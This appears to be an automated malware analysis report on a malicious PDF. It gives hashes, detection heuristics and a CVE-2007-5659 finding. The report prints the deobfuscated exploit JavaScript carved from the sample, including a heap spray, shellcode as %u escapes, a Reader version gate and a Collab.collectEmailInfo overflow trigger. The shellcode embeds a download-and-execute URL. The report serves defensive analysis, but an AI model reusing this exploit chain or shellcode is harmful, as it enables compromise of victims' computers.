Malicious PDF — malware analysis report

Static analysis result for SHA-256 a6a4c33d4a0f400a…

MALICIOUS

PDF

8.5 KB First seen: 2026-05-08
MD5: 4831b7e09b36dd7a292b215e9549cb52 SHA-1: d6c071540c30a096cf3aacd177efc1f55a4c4e2d SHA-256: a6a4c33d4a0f400a8028561b3fbce87244366a56c4ecbcb83497cbf417272e90
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The extracted JavaScript files, 'javascript_obj0004_000.js', 'numeric_charcode_stage_000.js', and 'legacy_pdfkit_stage_000.js', suggest an attempt to obfuscate and execute malicious code. The 'PDF_FOXIT_SYNCANNOTSCAN' heuristic specifically points to a technique where the PDF launcher decodes character codes to form JavaScript, which is then evaluated. This process likely aims to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var Hx272_1_x = new Array();var E3p6JDeh5U2b = 0;var Um5nHA = "";function f_2_6_e(b385QA__a8l_f, P_P___5QLem){var W_gj0754x = P_P___5QLem.toString();var O_4_n_2dWR45Tks = "";for(var D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < W_gj0754x.length; D8_03l_n_V4O3_r++) {var v__lawjsP = parseInt(W_gj0754x.substr(D8_03l_n_V4O3_r, 1));if (!isNaN(v__lawjsP)) {v__lawjsP = v__lawjsP.toString(16);if (v__lawjsP.length == 1) { v__lawjsP = "0" + v__lawjsP; }else if (v__lawjsP.length != 2) { v__lawjsP = "00"; }O_4_n_2 …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://googleinru.in/cgi-bin/etn/z002106201r0019R97f3b4e5X0bc5ac29Y74061c9bZ0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1C97 1742 bytes
SHA-256: 54741795558ba624990d1d1977c984a983f099f3011df3eac2b542668249772d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function t8Fvl__6_8(v_f0lc_wvA2b, G______i_5sqrM){var B8Uhen2lNv = 4;var VC_r_1_0rv_BPK = new Array();var TLhMMrH = new Array(107,256,11,  512, 106, 11,  44,40, 33);TLhMMrH[5] += 12;var r_4_RW8_w01_u = "";try {var hKbp4jqG_EhRq_y = 0;if (app) {G______i_5sqrM = pr[hKbp4jqG_EhRq_y].subject;}} catch(e) {}if (!v_f0lc_wvA2b) { VC_r_1_0rv_BPK[0] = 0;VC_r_1_0rv_BPK[1] = VC_r_1_0rv_BPK[0];VC_r_1_0rv_BPK[2] = VC_r_1_0rv_BPK[1];VC_r_1_0rv_BPK[3] = VC_r_1_0rv_BPK[2];var c___1_6Tt_5A = TLhMMrH[6] + 3;var x_wVX6k = c___1_6Tt_5A + 11;var K_660_o = t8Fvl__6_8;var D8qfAU2p = 0;K_660_o = K_660_o.toString();for(var G2N_FR8 = 0; G2N_FR8 < K_660_o.length; G2N_FR8++) {var l_R0jMd__v64O_1 = K_660_o.charCodeAt(G2N_FR8);if (l_R0jMd__v64O_1 > c___1_6Tt_5A && l_R0jMd__v64O_1 < x_wVX6k) {if (D8qfAU2p == 4) {D8qfAU2p = 0;}VC_r_1_0rv_BPK[D8qfAU2p] += l_R0jMd__v64O_1;if (VC_r_1_0rv_BPK[D8qfAU2p] > TLhMMrH[3]) {VC_r_1_0rv_BPK[D8qfAU2p] -= 512;}D8qfAU2p++;}}}else  { VC_r_1_0rv_BPK = v_f0lc_wvA2b;}for (var vIiyd_e7_4bn_A = 0; vIiyd_e7_4bn_A < 4; vIiyd_e7_4bn_A++) {if (VC_r_1_0rv_BPK[vIiyd_e7_4bn_A] > TLhMMrH[1]) {VC_r_1_0rv_BPK[vIiyd_e7_4bn_A] -= TLhMMrH[1];}}var YmRt_8P_0Wn = 0;var EoHU_q = 0;var S_4613_Mc;var ynxf__f = 0;while ( YmRt_8P_0Wn < G______i_5sqrM.length ) {var w0HDa_h = "";w0HDa_h = G______i_5sqrM.substr(YmRt_8P_0Wn, 2);var Fc_RtmB76bF_kt = parseInt(w0HDa_h, TLhMMrH[5]); if (EoHU_q == 4) {EoHU_q = 0;}Fc_RtmB76bF_kt -= (ynxf__f + 2) * VC_r_1_0rv_BPK[EoHU_q];if (Fc_RtmB76bF_kt < 0) {Fc_RtmB76bF_kt -= Math.floor(Fc_RtmB76bF_kt / TLhMMrH[1]) * TLhMMrH[1];}r_4_RW8_w01_u += String.fromCharCode(Fc_RtmB76bF_kt);{YmRt_8P_0Wn += 2;ynxf__f++;EoHU_q++;}}var b_8c2_VR = this;b_8c2_VR["eval"](r_4_RW8_w01_u);return 0;}

	t8Fvl__6_8(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4C3 5070 bytes
SHA-256: 92ef86ef0b6baa9734d9fdcd2f4cea9c6ae0ae4dfb9833e767d37db8ff650876
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Hx272_1_x = new Array();var E3p6JDeh5U2b = 0;var Um5nHA = "";function f_2_6_e(b385QA__a8l_f, P_P___5QLem){var W_gj0754x = P_P___5QLem.toString();var O_4_n_2dWR45Tks = "";for(var D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < W_gj0754x.length; D8_03l_n_V4O3_r++) {var v__lawjsP = parseInt(W_gj0754x.substr(D8_03l_n_V4O3_r, 1));if (!isNaN(v__lawjsP)) {v__lawjsP = v__lawjsP.toString(16);if (v__lawjsP.length == 1) { v__lawjsP = "0" + v__lawjsP; }else if (v__lawjsP.length != 2) { v__lawjsP = "00"; }O_4_n_2dWR45Tks = v__lawjsP + O_4_n_2dWR45Tks;}}while(O_4_n_2dWR45Tks.length < 8) { O_4_n_2dWR45Tks = "0" + O_4_n_2dWR45Tks; }var w70__tT___lu = b385QA__a8l_f.toString(16);if (w70__tT___lu.length == 1) { w70__tT___lu = "0" + w70__tT___lu; }else if (w70__tT___lu.length != 2) { w70__tT___lu = "00"; }O_4_n_2dWR45Tks = "3" + w70__tT___lu + "P" + O_4_n_2dWR45Tks;return O_4_n_2dWR45Tks;}function q7J_16(S58d8S_10, Qi2R_c){var V3ye__r73 = new Array("");var c__5_3_da = S58d8S_10;var LEm8u4xVOJw71Dr;if ((LEm8u4xVOJw71Dr = S58d8S_10.lastIndexOf("%u00")) != -1) {if (LEm8u4xVOJw71Dr + 6 == S58d8S_10.length) {V3ye__r73[0] = S58d8S_10.substr(LEm8u4xVOJw71Dr + 4, 2);c__5_3_da = S58d8S_10.substring(0, LEm8u4xVOJw71Dr);}}LEm8u4xVOJw71Dr = 1;for (D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < Qi2R_c.length; D8_03l_n_V4O3_r++) {var X6_bp_B__K = Qi2R_c.charCodeAt(D8_03l_n_V4O3_r).toString(16);if (X6_bp_B__K.length == 1) { X6_bp_B__K = "0" + X6_bp_B__K; }V3ye__r73[LEm8u4xVOJw71Dr] = X6_bp_B__K;LEm8u4xVOJw71Dr++;}D8_03l_n_V4O3_r = V3ye__r73[0].length ? 0 : 1;V3ye__r73[LEm8u4xVOJw71Dr] = "00";V3ye__r73[LEm8u4xVOJw71Dr + 1] = "00";LEm8u4xVOJw71Dr += 2;if ((V3ye__r73.length - D8_03l_n_V4O3_r) % 2) {V3ye__r73[LEm8u4xVOJw71Dr] = "00";}while(D8_03l_n_V4O3_r < V3ye__r73.length) {c__5_3_da += "%u" + V3ye__r73[D8_03l_n_V4O3_r + 1] + V3ye__r73[D8_03l_n_V4O3_r];D8_03l_n_V4O3_r += 2;}c__5_3_da += "%u0000";return c__5_3_da;}function cO_b_Qn(N4UY_1d, hw0J__3j3){while (N4UY_1d.length*2<hw0J__3j3) {N4UY_1d += N4UY_1d;}N4UY_1d = N4UY_1d.substring(0,hw0J__3j3/2);return N4UY_1d;}function Uki_38hm_j(dc_0O7e8NRc, mpDI_nPlJ, p4__k6_KXocX){var SS7_g1X_H477 = 0x0c0c0c0c;var N4UY_1d = unescape(mpDI_nPlJ);var Qi2R_c = f_2_6_e(dc_0O7e8NRc, p4__k6_KXocX);var Cl05U_l__1Rmn = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var S58d8S_10 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7670%u5945%u0076%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931%u3952%u6637%u6233%u6534%u5835%u6230%u3563%u6361%u3932%u3759%u3034%u3136%u3963%u5a62%u3130%u3030%u3066%u3036";app.f__yi73ky = unescape(q7J_16(S58d8S_10, Qi2R_c));var b__O_Ld = 0x400000;var Llcc2Pk_FcaGi = Cl05U_l__1Rmn.length * 2;var hw0J__3j3 = b__O_Ld - (Llcc2Pk_FcaGi+0x38);N4UY_1d = cO_b_Qn(N4UY_1d, hw0J__3j3);var ITI244W3 = (SS7_g1X_H477 - 0x400000)/b__O_Ld;for (var JE_i_7n = 0; JE_i_7n < ITI244W3; JE_i_7n++) {Hx272_1_x[JE_i_7n] = N4UY_1d + Cl05U_l__1Rmn;}}function PL2i67_0_N__3Dg(){var Q__Ug72Y = "";for (D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < 12; D8_03l_n_V4O3_r++) {Q__Ug72Y += unescape("%u0c0c%u0c0c");}var SI1_A_l_egf7 = "";for (D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < 750; D8_03l_n_V4O3_r++) {SI1_A_l_egf7 += Q__Ug72Y;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: SI1_A_l_egf7});app.clearTimeOut(E3p6JDeh5U2b);}function Ppq_uC(odl406k2__s4e_i){var WD5iol2f0_BR = E3p6JDeh5U2b;if ((odl406k2__s4e_i >= 8 && odl406k2__s4e_i < 8.11) || odl406k2__s4e_i < 7.1) {Uki_38hm_j(23, "%u0c0c%u0c0c", odl406k2__s4e_i);PL2i67_0_N__3Dg();}if (WD5iol2f0_BR) {app.clearTimeOut(WD5iol2f0_BR);}}var p4__k6_KXocX = 0;var N1AHR_4 = app.plugIns;for (var a_6_u_p_1 = 0; a_6_u_p_1 < N1AHR_4.length; a_6_u_p_1++) {var f0ce_X6a35 = N1AHR_4[a_6_u_p_1].version;if (f0ce_X6a35 > p4__k6_KXocX) { p4__k6_KXocX = f0ce_X6a35; }}if (app.viewerVersion == 9.103 && p4__k6_KXocX < 9.13) {p4__k6_KXocX = 9.13;}app.qu___T2C1S1_1Eh = Ppq_uC;E3p6JDeh5U2b = app.setTimeOut("app.qu___T2C1S1_1Eh(" + p4__k6_KXocX.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.